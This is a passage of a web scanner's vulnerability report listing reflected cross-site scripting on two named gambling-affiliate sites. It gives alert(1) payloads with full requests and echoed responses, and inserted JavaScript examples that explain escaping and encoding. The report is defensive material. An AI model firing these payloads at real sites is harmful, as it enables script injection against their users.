3.327. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a9e7</script><script>alert(1)</script>e9eb14befc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?CMI=1&7a9e7</script><script>alert(1)</script>e9eb14befc6=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:48:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1&7a9e7</script><script>alert(1)</script>e9eb14befc6=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
unction(){
       $("#brands_hopa_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=1&7a9e7</script><script>alert(1)</script>e9eb14befc6=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=1&7a9e7</script>
...[SNIP]...

3.328. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f66"><script>alert(1)</script>07b94151931 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4f66\"><script>alert(1)</script>07b94151931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=1&d4f66"><script>alert(1)</script>07b94151931=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1&d4f66\"><script>alert(1)</script>07b94151931=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.neogamespartners.com/WebSite/Affiliates/login.aspx?CMI=1&d4f66\"><script>alert(1)</script>07b94151931=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.329. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 9e26e--><script>alert(1)</script>6245676709c was submitted in the ARC cookie. This input was echoed unmodified in the application's response. The excerpt below shows the same value in the hidden AR input, where it sits inside a double-quoted attribute without terminating it; the comment into which it is also copied is not part of the excerpt.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that the response re-issues the cookie from the request (Set-Cookie: ARC=... with domain=.primescratchcards.com and a one-year expiry), so a value planted once is sent back to every page on the domain until it is cleared.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301379e26e--><script>alert(1)</script>6245676709c; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28416
Content-Type: text/html
Set-Cookie: ARC=1301379e26e%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6245676709c; expires=Tue, 15-May-2012 12:35:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301379e26e--><script>alert(1)</script>6245676709c">
...[SNIP]...
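
The three contexts in 3.326, 3.327 and 3.329 (and their repeats in 3.328, 3.332, 3.337 and 3.338) are decided by three HTML tokenizer rules: a quoted attribute value ends only at the matching quote, a script block ends at the first </script regardless of JavaScript quoting, and a comment ends at the first -->. The following example is added here and is not code from the scanner report or from the sites it covers. It implements those rules in a minimal tokenizer, splices the report's own payloads into the three sinks as the report shows them (the comment sink is constructed, since the report snips it), and counts the script elements a browser would create with the escaping the responses show versus the correct encoder for each context. The names tokenize, scriptElements, renderHomeLink, renderRedirectScript and renderComment are this example's own.

```javascript
// Added example, not code from the scanner report or from neogamespartners.com or
// primescratchcards.com. A minimal HTML tokenizer for the three rules that decide
// whether a reflected value escapes its context:
//   1. a quoted attribute value ends at the matching quote only; '\' is not an
//      escape in HTML, so the addslashes()-style \" seen in 3.326 changes nothing;
//   2. after <script ...> the tokenizer is in "script data" state and the element
//      ends at the first </script, whatever JavaScript quoting surrounds it;
//   3. after <!-- the comment ends at the first -->.
// tokenize() returns the elements and comments a browser would create, so a payload
// that breaks out shows up as an extra script element.
function tokenize(html) {
  const out = [];
  const lower = html.toLowerCase();
  let i = 0;
  while (i < html.length) {
    if (html.startsWith('<!--', i)) {                           // rule 3
      const end = html.indexOf('-->', i + 4);
      const stop = end === -1 ? html.length : end;
      out.push({ comment: html.slice(i + 4, stop) });
      i = end === -1 ? html.length : end + 3;
      continue;
    }
    if (html[i] === '<' && /[A-Za-z\/]/.test(html[i + 1] || '')) {   // start or end tag
      let j = i + 1;
      const endTag = html[j] === '/';
      if (endTag) j++;
      let name = '';
      while (j < html.length && /[A-Za-z0-9]/.test(html[j])) name += html[j++];
      let quote = null;                                          // rule 1: quotes pair up,
      while (j < html.length) {                                  // nothing else is special
        const c = html[j];
        if (quote) { if (c === quote) quote = null; }
        else if (c === '"' || c === "'") quote = c;
        else if (c === '>') break;
        j++;
      }
      i = j + 1;
      if (endTag) continue;                                      // end tags create nothing
      name = name.toLowerCase();
      if (name === 'script') {                                   // rule 2: script data state
        const end = lower.indexOf('</script', i);
        const stop = end === -1 ? html.length : end;
        out.push({ tag: 'script', text: html.slice(i, stop) });
        i = stop;                                                // </script> is read as an end tag next
      } else {
        out.push({ tag: name });
      }
      continue;
    }
    i++;
  }
  return out;
}

// The elements that would execute.
function scriptElements(html) {
  return tokenize(html).filter((t) => t.tag === 'script');
}

// Encoders: addslashes() reproduces the \" the responses show; escapeHtmlAttr() is the
// correct encoder for an attribute value (htmlspecialchars with ENT_QUOTES);
// escapeJsString() is the correct one for text inside a JavaScript string literal.
function identity(s) { return s; }
function addslashes(s) { return s.replace(/[\\'"]/g, (m) => '\\' + m); }
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function escapeJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Payloads copied from findings 3.326, 3.327 and 3.329.
const ATTR_PAYLOAD = '8bb36"><script>alert(1)</script>3f495d41aad';
const SCRIPT_PAYLOAD = '7a9e7</script><script>alert(1)</script>e9eb14befc6';
const COMMENT_PAYLOAD = '9e26e--><script>alert(1)</script>6245676709c';

// The three sinks in the shape the report shows them. renderComment() is constructed:
// the report states the ARC value lands in a comment but snips that part of the page.
function renderHomeLink(name, enc) {
  return '<a href="/?CMI=1&' + enc(name) + '=1" title="Home">';
}
function renderRedirectScript(name, enc) {
  return "<script>function RedirectToUrl(url){url=url+'?CMI=1&" + enc(name) + "=1';window.location=url;}</script>";
}
function renderComment(value, enc) {
  return '<!-- AR=' + enc(value) + ' -->';
}

// Standalone run: the script bodies each sink/encoder pair would execute.
for (const [label, html] of [
  ['attr/addslashes', renderHomeLink(ATTR_PAYLOAD, addslashes)],
  ['attr/escapeHtmlAttr', renderHomeLink(ATTR_PAYLOAD, escapeHtmlAttr)],
  ['script/raw', renderRedirectScript(SCRIPT_PAYLOAD, identity)],
  ['script/escapeJsString', renderRedirectScript(SCRIPT_PAYLOAD, escapeJsString)],
  ['comment/raw', renderComment(COMMENT_PAYLOAD, identity)],
]) console.log(label, scriptElements(html).map((t) => t.text));
```

With addslashes the attribute sink still yields a second element whose body is alert(1); with entity encoding it yields none. In the script sink the raw </script> splits the block into two script elements, and the only encoder that keeps it whole is one that removes "<" from the literal; entity-encoding there would corrupt the value rather than protect it. For the comment sink, encoding ">" stops --> from closing the comment, but the remediation that holds is to keep user data out of comments altogether.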

3.330. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4871b'%3balert(1)//7528fc9c822 was submitted in the ARC cookie. This input was echoed as 4871b';alert(1)//7528fc9c822 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374871b'%3balert(1)//7528fc9c822; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28368
Content-Type: text/html
Set-Cookie: ARC=1301374871b%27%3Balert%281%29%2F%2F7528fc9c822; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301374871b';alert(1)//7528fc9c822&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.331. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8bf4"%3balert(1)//350a49c0c13 was submitted in the ARC cookie. This input was echoed as c8bf4";alert(1)//350a49c0c13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c8bf4"%3balert(1)//350a49c0c13; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28368
Content-Type: text/html
Set-Cookie: ARC=130137c8bf4%22%3Balert%281%29%2F%2F350a49c0c13; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137c8bf4";alert(1)//350a49c0c13' border='0' width='1' height='1'>
...[SNIP]...
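
Findings 3.330 and 3.331 (repeated on InviteFriend.asp, Responsible.asp and SecurityAndPrivacy.asp as 3.333 through 3.336 and 3.339) differ from the HTML-context findings above: the server URL-decodes the cookie (%3b becomes ;) and pastes it between the quotes of a JavaScript string literal, so the payload terminates the literal rather than any tag. The example below is added here and is not code from the scanner report or from primescratchcards.com. It splices the report's two payloads into a constructed one-line assignment and into the window.open() call quoted in 3.330 (whose closing after status=no is snipped in the report and therefore assumed), executes each snippet with stand-ins for alert() and window.open(), and compares the page's raw splice with a JSON-based literal encoder. The names naiveLiteral, safeLiteral, assignSnippet, naiveLobby, safeLobby and run are this example's own.

```javascript
// Added example, not code from the scanner report or from primescratchcards.com.
// Payloads exactly as the report submitted them, after the server's URL-decoding.
const ARC_SINGLE = "13013767045';alert(1)//608d9fe8e13";   // 3.330 / 3.334 style
const ARC_DOUBLE = '130137c8bf4";alert(1)//350a49c0c13';   // 3.331 style

// What the page does: raw splice into an existing single-quoted literal.
function naiveLiteral(value) { return "'" + value + "'"; }

// Hardened: JSON.stringify escapes quotes, backslashes and control characters; the
// second pass \u-escapes <, > and the JS line terminators U+2028/U+2029 so the literal
// can never contain </script> or an unescaped line break for the HTML tokenizer.
function safeLiteral(value) {
  return JSON.stringify(value).replace(/[<>\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// (a) Minimal single-quoted string context, constructed for the demonstration.
function assignSnippet(value, literal) { return 'var ar=' + literal(value) + '; return ar;'; }

// (b) The lobby window.open() from 3.330. The closing after scrollbars is assumed
// (the report snips it). The naive form is the page's own shape; the safe form
// concatenates an encoded literal and URL-encodes it, because the value also lands
// inside a URL query string.
const LOBBY = 'https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=';
const TAIL = "&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb);";
function naiveLobby(value) {
  return "window.open('" + LOBBY + value + TAIL;
}
function safeLobby(value) {
  return "window.open('" + LOBBY + "' + encodeURIComponent(" + safeLiteral(value) + ") + '" + TAIL;
}

// Execute a snippet with recording stand-ins. new Function() replaces a browser so
// this runs under Node; the result records what alert() and window.open() received,
// the snippet's return value, and the name of any error (a SyntaxError means the
// injected value broke the page's script before it ran).
function run(snippet) {
  const alerts = [], opened = [];
  const win = { open: (url) => { opened.push(url); return null; } };
  try {
    const value = new Function('window', 'alert', 'x', 'y', 'sb', snippet)(
      win, (v) => alerts.push(v), 600, 800, 'no');
    return { value, alerts, opened, error: null };
  } catch (e) {
    return { value: undefined, alerts, opened, error: e.name };
  }
}

// Standalone run: one line per combination.
for (const [label, snippet] of [
  ['naive assign, single-quote payload', assignSnippet(ARC_SINGLE, naiveLiteral)],
  ['naive assign, double-quote payload', assignSnippet(ARC_DOUBLE, naiveLiteral)],
  ['safe assign, single-quote payload', assignSnippet(ARC_SINGLE, safeLiteral)],
  ['safe assign, double-quote payload', assignSnippet(ARC_DOUBLE, safeLiteral)],
  ['naive window.open', naiveLobby(ARC_SINGLE)],
  ['safe window.open', safeLobby(ARC_SINGLE)],
]) console.log(label, run(snippet));
```

Two things the run makes visible that the report's text does not: the double-quote payload is inert inside a single-quoted literal and vice versa, which is why the scanner submits both and why a check for one quote character is not a defence; and in the window.open() context the report's exact payload leaves the call's parenthesis unclosed, so the page's script fails to parse rather than running alert(1). That is still attacker control over the script's syntax, and the safe form is the only one in which the value survives as data in the opened URL.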

3.332. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload df246--><script>alert(1)</script>819719dda7e was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137df246--><script>alert(1)</script>819719dda7e; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26662
Content-Type: text/html
Set-Cookie: ARC=130137df246%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E819719dda7e; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137df246--><script>alert(1)</script>819719dda7e">
...[SNIP]...

3.333. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe783"%3balert(1)//5758c923b7f was submitted in the ARC cookie. This input was echoed as fe783";alert(1)//5758c923b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137fe783"%3balert(1)//5758c923b7f; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26668
Content-Type: text/html
Set-Cookie: ARC=130137fe783%22%3Balert%281%29%2F%2F5758c923b7f; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137fe783";alert(1)//5758c923b7f' border='0' width='1' height='1'>
...[SNIP]...

3.334. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67045'%3balert(1)//608d9fe8e13 was submitted in the ARC cookie. This input was echoed as 67045';alert(1)//608d9fe8e13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013767045'%3balert(1)//608d9fe8e13; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26614
Content-Type: text/html
Set-Cookie: ARC=13013767045%27%3Balert%281%29%2F%2F608d9fe8e13; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013767045';alert(1)//608d9fe8e13&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.335. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 139aa"%3balert(1)//16eb2f9deba was submitted in the ARC cookie. This input was echoed as 139aa";alert(1)//16eb2f9deba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137139aa"%3balert(1)//16eb2f9deba; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23468
Content-Type: text/html
Set-Cookie: ARC=130137139aa%22%3Balert%281%29%2F%2F16eb2f9deba; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137139aa";alert(1)//16eb2f9deba' border='0' width='1' height='1'>
...[SNIP]...

